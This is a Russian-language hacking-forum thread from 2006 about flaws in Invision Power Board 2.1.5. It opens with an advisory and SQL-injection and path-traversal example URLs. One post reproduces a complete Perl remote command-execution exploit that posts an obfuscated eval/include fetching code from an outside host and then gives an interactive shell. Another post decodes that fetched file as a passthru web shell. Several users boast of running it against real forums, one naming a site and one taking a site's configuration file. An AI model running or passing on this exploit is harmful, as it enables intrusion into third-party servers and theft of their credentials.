Форумы Уязвимость Invision Power Board 2.1.5

Discussion in 'Уязвимости CMS/форумов' started by Go0o$E, 26 Apr 2006.

Thread Status:
Not open for further replies.
  1. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Программа: Invision Power Board
    Уязвимые версии: 2.1.5 и, возможно, более ранние версии
    Тип: remote
    Опасность: высокая
    Описание ->
    1. Выполнение произвольного кода возможно из-за недостаточной фильтрации входящих от пользователя данных. Злонамеренный пользователь может сформировать текст сообщения, а затем выполнить произвольный код.
    2. Подключение произвольных файлов возможно при наличии администраторских прав.
    Пример:

    _http://host/admin.php?adsess=…&section=content&act=msubs&code=install-gateway&name=%08%08%08%08%08%08%08%08%08/../class_gw_test*[/url]

    3. SQL-инъекция в файле sources/lib/func_taskmanager.php
    Злонамеренный пользователь может сформировать и выполнить произвольный запрос в базе данных (длина запроса не должна превышать 32 символа).
    Пример:

    _http://www.host.com/index.php?act=task&ck='

    Решение: решения в настоящий момент не существует
    Источник: spam_(at)_we11er.co.uk

    SQL-инъекция работает, жаль ограничение 32 символа =(
     
    2 people like this.
  2. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    А про пункт 1 подробности есть? Или это всё про тот же известный Xss ?
     
  3. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Я не шибко понимаю в Sql. Какой нибудь толк от скуль иньекции есть этой? Ограничение есть ведь :(
     
  4. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
  5. andre

    andre New Member

    Joined:
    26 Mar 2006
    Messages:
    21
    Likes Received:
    4
    Reputations:
    2
    ## Invision Power Board 2.* commands execution exploit by RST/GHC
    ## vulnerable versions <= 2.1.5
    ## tested on 2.1.4, 2.0.2

    Code:
    #!/usr/bin/perl
    
    ## Invision Power Board 2.* commands execution exploit by RST/GHC
    ## vulnerable versions <= 2.1.5
    ## tested on 2.1.4, 2.0.2
    ##
    ## (c)oded by 1dt.w0lf
    ## RST/GHC
    ## http://rst.void.ru
    ## http://ghc.ru
    
    
    use IO::Socket;
    use Getopt::Std;
    
    getopts("l:h:p:d:f:v:");
    
    $host     = $opt_h;
    $dir      = $opt_d;
    $login    = $opt_l;
    $password = $opt_p;
    $forum    = $opt_f;
    $version  = $opt_v || 0;
    
    $|++;
    
    header();
    if(!$host||!$dir||!$login||!$password||!$forum) { usage(); }
    
    print "[~]    SERVER : $host\r\n";
    print "[~]      PATH : $dir\r\n";
    print "[~]     LOGIN : $login\r\n";
    print "[~]  PASSWORD : $password\r\n";
    print "[~]    TARGET : $version";
    print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*'));
    print "\r\n";
    
    print "[~] Login ... ";
    
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    $login    =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $post     = 'UserName='.$login.'&PassWord='.$password;
    $loggedin = 0;
    print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Content-length: ".length($post)."\r\n\r\n";
    print $sock "$post";
    print $sock "\r\n\r\n";
    while (<$sock>)
    {  
     if(/session_id=([a-f|0-9]{32})/) { $sid = $1; }
    }
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    print $sock "GET ${dir}index.php HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n\r\n";
    while (<$sock>)
    {    
     if(/act=Login&amp;CODE=03/) { $loggedin = 1; last; }
    }
    if($loggedin) { print " [ DONE ]\r\n"; }
    else { print " [ FAILED ]\r\n"; exit(); }
    
    print "[+] SID: $sid\r\n";
    
    print "[~] Try get md5_check ...";
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    if($version==1)
     {
     print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n";
     }
    else
     {
     print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n";
     }
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n\r\n";
    while (<$sock>)
     {  
     if($version == 1 && /ipb_md5_check\s*= \"([a-f|0-9]{32})\"/)  { $md5_check = $1; last; }
     if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; }
     }
    close($sock);
    if($md5_check) { print " [ DONE ]\r\n"; print "[+] MD5_CHECK : $md5_check\r\n"; }
    else { print " [ FAILED ]\r\n"; exit(); }
    
    print "[~] Create new message ...";
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    $created = 0;
    $text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)'.
            '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr(120).chr(116))); //';
    $post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0&CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_question=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0";
    print $sock "POST ${dir}index.php HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Content-length: ".length($post)."\r\n\r\n";
    print $sock "$post";
    print $sock "\r\n\r\n";
    while (<$sock>)
     {  
     if(/Location:/) { $created = 1; last; }
     }
    if($created) { print " [ DONE ]\r\n"; }
    else { print " [ FAILED ]\r\n"; exit(); }
    
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    print "[~] Search message ...";
    $post = 'keywords=r57ipbxplhohohoeval&namesearch='.$login.'&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=posts';
    print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Content-length: ".length($post)."\r\n\r\n";
    print $sock "$post";
    print $sock "\r\n\r\n";
    
    while (<$sock>)
     {
     if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; }
     }
    
    if($searchid) { print " [ DONE ]\r\n"; }
    else { print "[ FAILED ]\r\n"; exit(); }
    print "[+] SEARCHID: $searchid\r\n";
    
    $get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00';
    
    while ()
     {
        print "Command for execute or 'exit' for exit # ";
        while(<STDIN>)
         {
            $cmd=$_;
            chomp($cmd);
            exit() if ($cmd eq 'exit');
            last;
         }
        &run($cmd);
     }
    
    sub run()
     {
      $cmd =~ s/(.*);$/$1/eg;
      $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
      $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20';
      $cmd2 .= $cmd;
      $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F';
      $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
      
      print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1\r\n";
      print $sock "Host: $host\r\n";
      print $sock "Cookie: session_id=$sid;\r\n";
      print $sock "Connection: close\r\n\r\n";
    
      $on = 0;
      $runned = 0;
      while ($answer = <$sock>)
       {
        if ($answer =~ /^_END_/) { return 0; }
        if ($on == 1) { print "  $answer"; }
        if ($answer =~ /^_START_/) { $on = 1; }
       }
     }
     
    sub header()
     {
     print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";   
     print " Invision Power Board 2.* commands execution exploit by RST/GHC\r\n";
     print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
     }
     
    sub usage()
     {
     print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> -v <version>\r\n\r\n";
     print "<host>     - host where IPB installed e.g www.ipb.com\r\n";
     print "<dir>      - folder where IPB installed e.g. /forum/ , /ipb/ , etc...\r\n";
     print "<login>    - login of any exist user\r\n";
     print "<password> - and password too )\r\n";
     print "<forum>    - number of forum where user can create topic e.g 2,4, etc\r\n";
     print "<version>  - forum version:\r\n";
     print "             0 - 2.0.*\r\n";
     print "             1 - 2.1.*\r\n";
     exit();
     }
    
    проверял на 2.1.5 - работает
     
    2 people like this.
  6. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    Rst/ghc опять порадовали нас свойми сплойтами и как всагда там какойнибудь сюрприз :)
     
    1 person likes this.
  7. jagga_man

    jagga_man New Member

    Joined:
    31 Mar 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    да он есть 100% ) нужно копаться в коде)
     
  8. 0verfe1

    0verfe1 New Member

    Joined:
    28 Aug 2005
    Messages:
    12
    Likes Received:
    2
    Reputations:
    -2
    у меня всё ок,почти тока когда надо выполнять команду,ввожу и всё равно ничего =)),сейчас буду пробывать на других форумах
    Code:
    [~]    TARGET : 0 - IPB 2.0.*
    [~] Login ...  [ DONE ]
    [+] SID: eba6aea1bb52b4e2b96e71496c1d019d
    [~] Try get md5_check ... [ DONE ]
    [+] MD5_CHECK : 37b1d4a901d9fa423421d1c3b04181c9
    [~] Create new message ... [ DONE ]
    [~] Search message ... [ DONE ]
    [+] SEARCHID: 57404f05bbfa5153ffd009ac0782d291
    Command for execute or 'exit' for exit # id
    Command for execute or 'exit' for exit # ls -la
    Command for execute or 'exit' for exit # uname -a
    Command for execute or 'exit' for exit # exit
    
    в чем может быть проблема ?

    и ещё очень часто:
    Code:
    [~] Login ...  [ DONE ]
    [+] SID: 1cac47e9bc3eb086a6931ebb997d926b
    [~] Try get md5_check ... [ FAILED ]
     
    #8 0verfe1, 27 Apr 2006
    Last edited: 27 Apr 2006
  9. AoD

    AoD Elder - Старейшина

    Joined:
    10 Feb 2006
    Messages:
    29
    Likes Received:
    11
    Reputations:
    2
    В сплоите в 95 строке есть зашифрованая в charsete ссылка _http://rst.void.ru/r57ipbinc.txt с содержимым

    Code:
    <?
    /*
    r57ipbce exploit include file
    */
    passthru($_GET['eharniy_ekibastos']);
    ?>
    
     
    1 person likes this.
  10. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Очень даже хорошо работает exploit! Проверил на lineageii.ru.
     
  11. 0verfe1

    0verfe1 New Member

    Joined:
    28 Aug 2005
    Messages:
    12
    Likes Received:
    2
    Reputations:
    -2
    да отлично работает =))) просто не на всех форумах
     
  12. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
  13. Carle-On-Line

    Carle-On-Line New Member

    Joined:
    23 Apr 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Так я не пойму, есть шифровка в сплойте или нет!?
     
  14. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
  15. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Хм... У меня сплойт пишет
    [~] Create new message ... [ FILED ]

    На форуме появляется новая тема с мессагой. В сообщении эта самая шифровка из 95 строки.
     
  16. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    с шифровкой понятно, идем по линку, и по идее из того текстовика нужно вставить код в сплоит, чет не выходит, у кого получилось?
     
  17. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    на 2.1.x не всегда работает. На 2.0.x всё ок! Отправил на мыло себе conf_global.php =))
     
  18. Black_Death

    Black_Death New Member

    Joined:
    16 Nov 2004
    Messages:
    26
    Likes Received:
    1
    Reputations:
    -1
    #18 Black_Death, 28 Apr 2006
    Last edited: 28 Apr 2006
  19. nec

    nec Elder - Старейшина

    Joined:
    6 Jul 2005
    Messages:
    98
    Likes Received:
    20
    Reputations:
    1
  20. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
Thread Status:
Not open for further replies.